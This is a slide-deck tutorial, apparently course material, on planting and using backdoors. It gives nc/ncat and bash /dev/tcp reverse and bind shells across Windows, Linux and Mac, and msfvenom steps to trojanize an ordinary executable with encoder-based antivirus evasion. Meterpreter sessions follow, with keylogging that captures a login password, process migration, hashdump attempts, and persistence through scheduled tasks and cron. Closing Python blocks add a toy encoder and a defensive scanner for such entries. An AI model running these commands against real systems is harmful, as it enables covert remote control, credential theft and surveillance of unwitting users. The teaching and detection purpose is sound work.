---
title: "Markdown slide"
theme: "beige"
author: "Wildlinux"
date: "Feb 20, 2018"
output: revealjs::revealjs_presentation
---
Topics: using nc to open backdoor connections between Windows, Mac and Linux
: applying meterpreter
: applying MSF POST modules
Goal: see for yourself how simple it is to set up a backdoor connection, and how powerful it is. Doing it by hand and understanding this fact raises your own security awareness.
Last edited: ~~20230221~~ Wildlinux
A backdoor is a channel for accessing a system that bypasses the normal authentication flow.
Where are backdoors found?
--
Some examples from recent years:
--
What follows uses a somewhat narrower notion of backdoor:
--
* First, you need such a program
  * the netcat family
  * meterpreter
  * intersect
  * ...and a great many more
  * whoever leads this topic should explore one not covered here
* Second, it has to get onto the system
  * legitimate software that ships with a backdoor, either deliberately or after the vendor was compromised
  * legitimate library files that contain a backdoor
  * essentially, anything that needs to trick you into downloading or opening it counts as phishing of one kind or another
    * an installer containing a backdoor, posted online for download
    * the backdoor bound to some specific file, posted online for download
    * a malicious program sent to you directly
    * an attack link sent to you directly, with a malicious site dropping the trojan
    * a USB stick you picked up somewhere: open a file to have a look?
    * a pretty girl or handsome guy copies it to you straight from a USB stick
  * exploiting a system vulnerability, then installing the backdoor once control is gained
* Third, it has to run
  * autostart on boot
    * Windows scheduled tasks
    * Linux cron
  * disguised as commonly used software so the user clicks it
  * trojanized legitimate software
* Next, it must not be detected by the host's malicious-code scanner
  * anti-virus evasion techniques
* And it must not be noticed by the host or network firewalls
  * reverse (connect-back) connections
  * encrypted connections
  * tunnelling
--
1. About netcat
A low-level tool that sends and receives raw TCP and UDP data. It is often combined with other tools to act as a backdoor. Note that Debian and Kali ship two implementations: `nc.traditional` supports `-e` (run a program on the connection), while the OpenBSD `nc` does not; if `-e` is rejected in the exercises below, use `nc.traditional` or Nmap's `ncat`, which is the tool used on the Windows side.
--
--
The exercises below use Windows 7 64-bit and Kali 2 64-bit.
1. Windows opens a listener
c:\your_nc_dir>ncat.exe -l -p 8888
2. Linux connects back to Windows
root@KaliYL:/var/www/html# nc 192.168.20.175 8888 -e /bin/sh
3. Windows gets a Linux shell and can run any command, e.g. ls
c:\your_nc_dir>ncat.exe -l -p 8888 #this is the command entered in step 1; do not type it again
ls
--
1. Run the listener on Linux
root@KaliYL:/var/www/html# nc -l -p 8888
2. Windows connects back to Linux
c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_linux 8888
3. Linux shows the Windows command prompt
root@KaliYL:/var/www/html# nc -l -p 8888
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\YLWin\Desktop\ncat>
--
Mac: nc -l 8888
Win: c:\your_nc_dir>ncat.exe -e cmd.exe ip_of_mac 8888
--
1. Start the listener on Windows
Win: C:\Users\YLWin\Desktop\ncat>ncat.exe -l -p 8888
2. Mac connects to Windows
bash -i >& /dev/tcp/ip_of_win/8888 0>&1
3. Windows gets the Mac shell
C:\Users\YLWin\Desktop\ncat>ncat.exe -l -p 8888
bash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
bash-3.2$
bash-3.2$ exit
--
1. On the controlling (server) side, the Mac runs the following; 8888 is the port nc listens on.
MacBook-Pro:$ nc -l 8888
2. The controlled machine (client) runs the following. Replace 192.168.1.106 with the Mac's IP from the previous step; 8888 is the port from the previous step.
root@KaliYL:/var/www/html# bash -i >& /dev/tcp/192.168.1.106/8888 0>&1
`nc IP Port -e /bin/sh` achieves the same effect
3. The Mac shows the Linux command prompt and can run any Linux command.
MacBook-Pro:$ nc -l 8888
root@KaliYL:/var/www/html# uname -a
uname -a
Linux KaliYL 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux
--
#### 2.1.6 Linux gets a Mac shell
1. Start the listener on Linux
root@KaliYL:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.20.154 netmask 255.255.255.0 broadcast 192.168.20.255
root@KaliYL:/var/www/html# nc -l -p 8888
2. Mac connects to Linux
localhost:~ $ bash -i >& /dev/tcp/192.168.20.154/8888 0>&1
3. Linux gets the Mac shell
root@KaliYL:/var/www/html# nc -l -p 8888
bash-3.2$
bash-3.2$ uname -a
Darwin localhost 14.5.0 Darwin Kernel Version 14.5.0: Mon Aug 29 21:14:16 PDT 2016; root:xnu-2782.50.6~1/RELEASE_X86_64 x86_64
--
--
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
$ nc host.example.com 1234 < filename.in
After the file has been transferred, the connection will close automatically.
--
Netcat++, the super netcat.
Don't believe it? Read its README.
The Windows build is in the attachment; unzip and run, no installation needed.
Proxying, forwarding and similar tasks can all be done with this tool.
Test environment: Kali2-2016.1 Last modified: 2016.08.28 wildlinux
* basic functions (basic connections, executing commands)
* extended functions (e.g. collecting user information, installing services)
* encoding modes
* target platforms
* runtime parameters
--
Typical platforms include:
--
Next we learn how to generate a backdoor executable with msfvenom. The backdoor program we generate is Meterpreter.
The article 《揭开Meterpreter的神秘面纱》 (Unveiling Meterpreter) covers some of meterpreter's internals.
--
The ./KiTTYPortable.exe used in the commands below is an ordinary Windows executable that I copied into /home/YL/; the backdoor is written into this file. I used KiTTYPortable.exe for the experiment; you can substitute any other executable, as long as it has been copied to the Linux box.
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
*** or, more simply ***
root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.136 LPORT=443 -f exe > meter_backdoor.exe
--
Parameter explanation:
-p the payload to use. "Payload" means the cargo being carried; here windows/meterpreter/reverse_tcp is a piece of shellcode.
-x the executable to use as a template; the payload (shellcode) is written into this executable.
-e the encoder to use; it transforms the shellcode, for AV evasion.
-i the number of encoder iterations; as above, encode five times with this encoder.
-b badchars: bytes that must not appear anywhere in the payload.
LHOST the IP to connect back to
LPORT the port to connect back to
-f the output format
> the file to write to
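What `-e`, `-i` and `-b` together promise is easiest to see in miniature. The Python below is an added example, not msfvenom's shikata_ga_nai and not code from the slides; it emits no decoder stub and uses a single-byte XOR, so it only demonstrates the contract an encoder has to satisfy: after each of the `-i` passes, no byte of the output may be in the `-b` list, and decoding must restore the original. The "payload" is a constructed byte string chosen to end in a `\x00`, not shellcode taken from the page.

```python
"""Toy multi-pass XOR encoder illustrating msfvenom's -e / -i / -b contract:
every pass picks a key such that the encoded bytes contain none of the bad
characters; the decoder reverses the passes in the opposite order."""

# Constructed sample (NOT real shellcode): 24 bytes that end in a NUL, the
# classic bad character for string-copy based overflows.
SAMPLE_PAYLOAD = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd8000")
BADCHARS = b"\x00"          # what -b '\x00' asks for


def contains_badchars(data, badchars):
    """True if any byte of data is in the bad-character list."""
    return any(b in badchars for b in data)


def xor_encode(data, key):
    """Single-byte XOR; XOR is its own inverse, so this is also the decoder."""
    return bytes(b ^ key for b in data)


def find_key(data, badchars):
    """Pick the first key whose output is free of bad characters.  A real
    decoder stub embeds the key, so the key itself must be clean as well."""
    for key in range(1, 256):
        if key in badchars:
            continue
        if not contains_badchars(xor_encode(data, key), badchars):
            return key
    return None              # no single-byte key satisfies the constraint


def encode(payload, badchars=BADCHARS, iterations=1):
    """Apply `iterations` passes (msfvenom -i); return encoded bytes and the keys."""
    data, keys = payload, []
    for _ in range(iterations):
        key = find_key(data, badchars)
        if key is None:
            raise ValueError("no single-byte key avoids the bad characters")
        data = xor_encode(data, key)
        keys.append(key)
    return data, keys


def decode(data, keys):
    """Undo the passes in reverse order (what the decoder stub would do at run time)."""
    for key in reversed(keys):
        data = xor_encode(data, key)
    return data


if __name__ == "__main__":
    enc, keys = encode(SAMPLE_PAYLOAD, BADCHARS, iterations=5)
    print("keys per pass:", keys)
    print("bad chars in raw payload:", contains_badchars(SAMPLE_PAYLOAD, BADCHARS))
    print("bad chars after encoding:", contains_badchars(enc, BADCHARS))
    print("round trip ok:", decode(enc, keys) == SAMPLE_PAYLOAD)
```

Two things carry over to the real tool. First, iterations do not add secrecy: each pass is fully reversible from the keys the decoder stub carries, so `-i 5` only changes the bytes a signature scanner sees. Second, the constraint can become unsatisfiable (the `None` branch above, which msfvenom reports as a failed encoding), so always check the generated file for bad characters rather than trusting the flags.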
--
On Linux, proceed as follows up to the `exploit` step;
root@KaliYL:/home/YL# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 443 yes The listen port
msf exploit(handler) > set LHOST 192.168.20.136
LHOST => 192.168.20.136
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.20.136:443
[*] Starting the payload handler...
Notes:
--
The listener on Linux receives the connection initiated by the Windows host and gets a remote-control shell:
[*] Sending stage (957999 bytes) to 192.168.20.176
[*] Meterpreter session 1 opened (192.168.20.136:443 -> 192.168.20.176:50169) at 2016-08-28 21:38:22 +0800
meterpreter >
meterpreter > dir
Listing Z:\yudong\PortableApps\KiTTYPortable
*=============================================*
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 170 dir 2014-08-21 18:13:08 +0800 App
40777/rwxrwxrwx 374 dir 2016-08-12 00:33:48 +0800 Data
100777/rwxrwxrwx 173040 fil 2014-06-26 06:52:12 +0800 KiTTYPortable.exe
100777/rwxrwxrwx 173040 fil 2016-08-28 21:26:40 +0800 KiTTy_backdoor.exe
40777/rwxrwxrwx 136 dir 2014-08-21 18:13:13 +0800 Other
100666/rw-rw-rw- 5347 fil 2012-06-28 09:11:58 +0800 help.html
--
--
1. help is naturally my pick for the popularity award. Type help and relax; no more worrying about forgetting a command. It is all in English, of course; the annotations are mine.
meterpreter > help
Core Commands (part 1: core commands)
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands (part 2: file-system operations)
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands (networking operations, naturally)
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands (system commands)
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands (user interface; yes, it can even capture keystrokes)
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands (What, video? Someone asked me about this yesterday. Tested: it can take pictures on Win7.)
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands (privilege escalation)
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
*** Did not succeed on my Win7 ***
Priv: Password database Commands (dump the SAM password database)
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
*** Did not succeed on my Win7 ***
Priv: Timestomp Commands (alter file timestamps, for cleaning up traces)
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
So many fun commands; I want to try them all and can't stop.
--
2. Get a Windows command prompt, for conveniently running Windows built-in commands; `exit` returns to meterpreter.
meterpreter > shell
Process 8984 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\YLWin\Desktop>exit
exit
meterpreter >
--
3. Get a Ruby interactive shell; `exit` returns. If you are up to it you can even program in Ruby directly (PS: I can't, so I won't say more). It is said that any Windows API can be called from here. See chapter 9 of 《Metasploit魔鬼训练营》 for a small example.
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> client.sys.config.sysinfo()
=> {"Computer"=>"YLWIN-PC", "OS"=>"Windows 7 (Build 7600).", "Architecture"=>"x64 (Current Process is WOW64)", "System Language"=>"zh_CN", "Domain"=>"WORKGROUP", "Logged On Users"=>3}
>> exit
meterpreter >
--
4. Let's play with processes and migration: move meterpreter into another process, so it no longer matters if the user closes the current one.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
...there will be many processes; I skip them here...
4312 9376 iexplore.exe x86 1 YLWin-PC\YLWin C:\Program Files (x86)\Internet Explorer\iexplore.exe   (found IE; migrate into it)
meterpreter > migrate 4312
[*] Migrating from 8656 to 4312...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 4312   (success!)
meterpreter >
*** PS: On Windows, run the command prompt as administrator and type "netstat -bn" to see which exe holds the connection to meterpreter; after a migrate it will be the process you moved into, not the original backdoor ***
--
5. Take a screenshot, steal a login password, that sort of thing
meterpreter > screenshot
Screenshot saved to: /usr/share/intersect/Scripts/rWjouIAU.jpeg
*** Open the jpeg and see what you find ***
meterpreter > ps
Process list
=================
PID Name Path
--- ---- ----
401 winlogon.exe C:\WINNT\system32\winlogon.exe
meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
**** A while later the admin from next door comes by and, naturally, logs into the system to take a look... ****
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!
*** To sniff a particular process's keystrokes you must migrate into it first; logon passwords are typed into winlogon.exe ***
--
MSF ships with a very large number of POST modules, all of which can be used from within meterpreter. POST (post-exploitation) modules are the attack modules you may need once you have gained initial control of a system.
*** The POST modules for Windows fall into the following groups; these are directory names, but effectively also the categories of POST module ***
root@KaliYL:/usr/share/metasploit-framework/modules/post/windows# ls
capture escalate gather manage recon wlan
*** capture, escalate (privilege escalation), gather (information gathering), manage, recon, wlan (wireless) ***
--
Using POST modules is simple: once you have a meterpreter session there are two basic commands, `info` to read a module's description and `run` to run it. To see which modules are available, look into the directories listed above.
*** This POST module checks whether the controlled machine is a virtual machine ***
meterpreter > info post/windows/gather/checkvm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module attempts to determine whether the system is running
inside of a virtual environment and if so, which one. This module
supports detectoin of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen,
and QEMU.
*** run ***
meterpreter > run post/windows/gather/checkvm
[*] Checking if YLWIN-PC is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >
*** Try dumping the passwords! It says a SYSTEM context is required; the hint is to migrate into a service process. I tried several; migration failed. ***
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY e791bff46194c82f87e08b89c249535b...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
*** Try the keylogger ***
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against YLWIN-PC
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt
[*] Recording keystrokes...
*** Ctrl+C stops the recording ***
^C[*] User interrupt.
[*] Shutting down keylog recorder. Please wait...
meterpreter >
*** Everything is in this file: /root/.msf4/loot/20161026094348_default_192.168.20.145_host.windows.key_150214.txt ***
--
Two methods; both are on page 411 of 《Metasploit魔鬼训练营》.
1. run persistence
*** Always read the help first ***
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
*** Tried it; not successful, since no success message appears at the end ***
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.20.136
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/YLWIN-PC_20161026.0846/YLWIN-PC_20161026.0846.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.20.136 LPORT=443
[*] Persistent agent script is 99614 bytes long
meterpreter >
--
2. run metsvc
*** Not successful; the probable cause is that the current process lacks SYSTEM privileges. It comes down to one question: how to escalate privileges? ***
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
meterpreter >
--
3. Other methods
In our scenario it is simple: the program is already on the system, so all it needs is to start automatically. Adding a scheduled task works, and so does editing the registry by hand.
--
Create a new scheduled task
Trigger
"On workstation lock of any user"
Action -> Program or script
c:\Users\YLWin\Desktop\ncat\ncat.exe
Action -> Add arguments:
-e cmd.exe 192.168.1.105 8080
With nc listening on the controller at 192.168.1.105:8080, every time a user locks the controlled machine it connects back to 192.168.1.105:8080. Tested: works.
--
--
PowerShell is Microsoft's enhanced shell and is built into every current Windows release (Win7 included). Type "powershell" into Run and you get something that looks just like a cmd.exe window, except that it supports almost every Windows operation: whatever can be done in the GUI can be done from PowerShell, and it supports scripting.
A side effect: malicious code written as a PowerShell script was, at the time, almost never detected by anti-virus (probably because it was rarely used, so AV did not bother to inspect it). Since Windows 10 PowerShell is hooked by AMSI and can log script blocks, so this is no longer a safe assumption for either side.
PowerShell also has a netcat equivalent, powercat, which can serve as a backdoor.
--
Cron is the Linux task scheduler: the cron daemon wakes up once a minute and runs whichever commands in its configuration files (crontabs) are due. See "man cron" for details.
--
1. Add a scheduled job with the crontab command; "-e" means edit.
root@KaliYL# crontab -e
no crontab for root - using an empty one
Select an editor. To change later, run 'select-editor'.
1. /bin/nano <---- easiest
2. /usr/bin/mcedit
3. /usr/bin/vim.basic
4. /usr/bin/vim.gtk
5. /usr/bin/vim.tiny
--
2. Since this is the first edit, it asks which editor to use; I chose 3 and added the last line. In short: at minute 43 of every hour, run the command that follows.
Choose 1-5 [1]: 3
crontab: installing new crontab
# m(minute) h(hour) dom(day of month) mon(month) dow(day of week) command
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
--
3. The configuration takes effect as soon as you save and quit. Check it with "crontab -l"; "-l" means list.
root@KaliYL# crontab -l
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
--
4. At minute 43 of every hour the command above runs.
5. If on another host, 192.168.1.105, you have nc listening on port 8090, then at minute 43 you get a shell. Tested: works. This is the simplest reverse backdoor. You can also open a non-reverse (bind) backdoor: write the cron command as "nc -l -p 8087 -e /bin/sh"; the controlling host can then connect at any time with "nc IP 8087" and get a shell. Note that nc exits when its connection closes, so each cron run yields one session: the reverse variant gives you one chance per hour, and the bind variant has to be run again after every connection.
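Both persistence mechanisms in this deck (the Windows scheduled task that runs `ncat.exe -e cmd.exe ...` when the workstation locks, and the crontab line that runs `/bin/netcat ... -e /bin/sh` at minute 43) leave the backdoor command sitting in a configuration an administrator can read. The Python below is an added example, not part of the original slides, of the check a defender would run over those entries: it parses crontab lines (including `@reboot`-style schedules) and scheduled-task actions and flags the patterns used on this page. The crontab text and the task list are constructed samples that mix the slides' entries with benign ones; the pattern list is deliberately narrow and a real deployment would extend it.

```python
"""Scan crontab entries and Windows scheduled-task actions for the reverse/bind
shell patterns used in this deck (nc/ncat -e, bash /dev/tcp, nc listeners)."""
import re

# Each pattern is (regex, reason).  Tuned to the commands on this page, not a
# complete catalogue of reverse-shell one-liners.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s(-e|-c|--exec|--sh-exec)\s"),
     "netcat executing a program over the socket (-e/-c)"),
    (re.compile(r"/dev/tcp/"),
     "bash /dev/tcp reverse shell"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s(-l|--listen)\b"),
     "netcat bind listener"),
    (re.compile(r"\b(nc|ncat|netcat|bash|sh|powershell|powercat)\b.*\b(\d{1,3}\.){3}\d{1,3}\b"),
     "shell or netcat with a literal IP address"),
]

# Constructed sample crontab: one benign job plus the entries from the slides.
SAMPLE_CRONTAB = """# m h dom mon dow command
0 2 * * * /usr/bin/apt-get update
43 * * * * /bin/netcat 192.168.1.105 8090 -e /bin/sh
@reboot /usr/bin/nc -l -p 8087 -e /bin/sh
*/10 * * * * bash -c 'bash -i >& /dev/tcp/192.168.1.105/8888 0>&1'
"""

# Constructed sample scheduled-task actions (the fields schtasks /query /v or
# Get-ScheduledTask would give you): task name, program, arguments.
SAMPLE_TASKS = [
    {"name": "Backup", "program": r"C:\Windows\System32\robocopy.exe",
     "args": r"C:\data D:\backup /MIR"},
    {"name": "Updater", "program": r"c:\Users\YLWin\Desktop\ncat\ncat.exe",
     "args": "-e cmd.exe 192.168.1.105 8080"},
]


def classify(command):
    """Return the list of reasons a command line looks like a backdoor."""
    return [reason for rx, reason in SUSPICIOUS_PATTERNS if rx.search(command)]


def parse_crontab(text):
    """Yield (line number, schedule, command) for each job in a crontab."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # blank or comment
        if "=" in line.split()[0]:
            continue                      # VAR=value environment line
        if line.startswith("@"):          # @reboot, @hourly, ...
            parts = line.split(None, 1)
        else:
            parts = line.split(None, 5)   # five time fields, then the command
            if len(parts) < 6:
                continue
            parts = [" ".join(parts[:5]), parts[5]]
        if len(parts) == 2:
            yield lineno, parts[0], parts[1]


def scan_crontab(text):
    """Findings for a crontab: only the entries that match at least one pattern."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = classify(command)
        if reasons:
            findings.append({"line": lineno, "schedule": schedule,
                             "command": command, "reasons": reasons})
    return findings


def scan_tasks(tasks):
    """Findings for scheduled tasks; program and arguments are checked together."""
    findings = []
    for task in tasks:
        command = f"{task['program']} {task['args']}"
        reasons = classify(command)
        if reasons:
            findings.append({"name": task["name"], "command": command,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']} [{f['schedule']}]: {f['command']}")
        print("   ", "; ".join(f["reasons"]))
    for f in scan_tasks(SAMPLE_TASKS):
        print(f"task {f['name']}: {f['command']}")
        print("   ", "; ".join(f["reasons"]))
```

In practice you would feed it `crontab -l` output for every user plus the files under /etc/cron.d, and on Windows the exported task list, and treat any hit as something to look at rather than as proof: the real signal is a scheduler entry that runs a network tool with a program-execution flag, which legitimate jobs almost never do.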
--